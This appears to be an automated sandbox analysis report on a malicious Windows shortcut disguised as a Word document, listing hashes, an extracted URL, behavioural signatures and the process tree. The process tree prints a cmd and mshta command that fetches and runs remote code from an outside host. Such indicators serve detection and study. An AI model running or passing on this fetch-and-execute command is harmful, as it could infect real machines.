Analysis
-
max time kernel
31s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
01-03-2023 16:26
Static task
static1
Behavioral task
behavioral1
Sample
Data/New Document.docx.lnk
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Data/New Document.docx.lnk
Resource
win10v2004-20230220-en
General
-
Target
Data/New Document.docx.lnk
-
Size
548KB
-
MD5
1a1c8c0f5cafb7df661086bcb804154c
-
SHA1
3b0f3682f9407bf0e0f8c80c42d5b5eb07f3e009
-
SHA256
06daafd4c09594d660c2191b4a421564b492a7043e4db4e91827fbc732d068a8
-
SHA512
c12904f4fa9ae06f0be15296c65fa4496153555e0d7543a944646661b009450ed9cf0bbe3c0aaf86f514514990ee108037ec976f7dd371bd998609c02075ed8a
-
SSDEEP
12288:U91M3doO2I7h0nGYeLfT9wgeRNLgEP2X9BGFsqmXxI:uMC67h0n92X9BGSqGxI
Malware Config
Extracted
https://hpuniversity.in/files/data/start
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1736 wrote to memory of 1200 1736 cmd.exe 28 PID 1736 wrote to memory of 1200 1736 cmd.exe 28 PID 1736 wrote to memory of 1200 1736 cmd.exe 28
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Data\New Document.docx.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://hpuniversity.in/files/data/start && mshta.exe2⤵
- Modifies Internet Explorer settings
PID:1200
-